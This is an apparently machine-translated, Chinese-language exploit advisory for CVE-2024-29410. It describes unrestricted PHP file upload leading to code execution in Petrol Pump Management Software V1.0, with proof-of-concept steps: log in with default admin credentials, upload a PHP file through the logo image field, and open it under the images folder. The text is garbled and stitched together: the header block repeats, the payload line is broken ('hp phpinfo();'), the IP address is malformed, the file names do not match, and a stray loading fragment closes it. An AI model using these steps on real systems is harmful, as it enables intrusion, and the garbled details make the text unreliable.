#利用标题:汽油泵管理软件V1.0-远程代码执行(RCE)
#日期: 02/04/2024
#利用作者: Sandeep Vishwakarma
#供应商homepage: https://www.sourcecodester.com
#软件链接3:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
#版本: V1.0
#测试在: Windows 10
#CVE: CVE-2024-29410
#Description: Petrol Pump Management软件中的文件上传漏洞V.1.0允许攻击者通过精心设计的有效载荷执行任意代码到Web_crud.php组件中的徽标照片参数。
#POC:
1。在这里我们转到: 3http://127.0.0.0.1/fuelflow/index.php
2。现在使用默认用户名=[email protected]和password=admin登录
3。现在转到'http://127.0.0.1/fuelflow/admin/web.php'
4。将san.php文件上传到“图像”字段中
5。phpinfo将存在于'http://localhost/fuelflow/Assets/images/phpinfo.php'页面中
6。san.php文件的内容在
hp phpinfo();
#参考:
#日期: 02/04/2024
#利用作者: Sandeep Vishwakarma
#供应商homepage: https://www.sourcecodester.com
#软件链接3:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
#版本: V1.0
#测试在: Windows 10
#CVE: CVE-2024-29410
#Description: Petrol Pump Management软件中的文件上传漏洞V.1.0允许攻击者通过精心设计的有效载荷执行任意代码到Web_crud.php组件中的徽标照片参数。
#POC:
1。在这里我们转到: 3http://127.0.0.0.1/fuelflow/index.php
2。现在使用默认用户名=[email protected]和password=admin登录
3。现在转到'http://127.0.0.1/fuelflow/admin/web.php'
4。将san.php文件上传到“图像”字段中
5。phpinfo将存在于'http://localhost/fuelflow/Assets/images/phpinfo.php'页面中
6。san.php文件的内容在

#参考:
正在加载...
github.com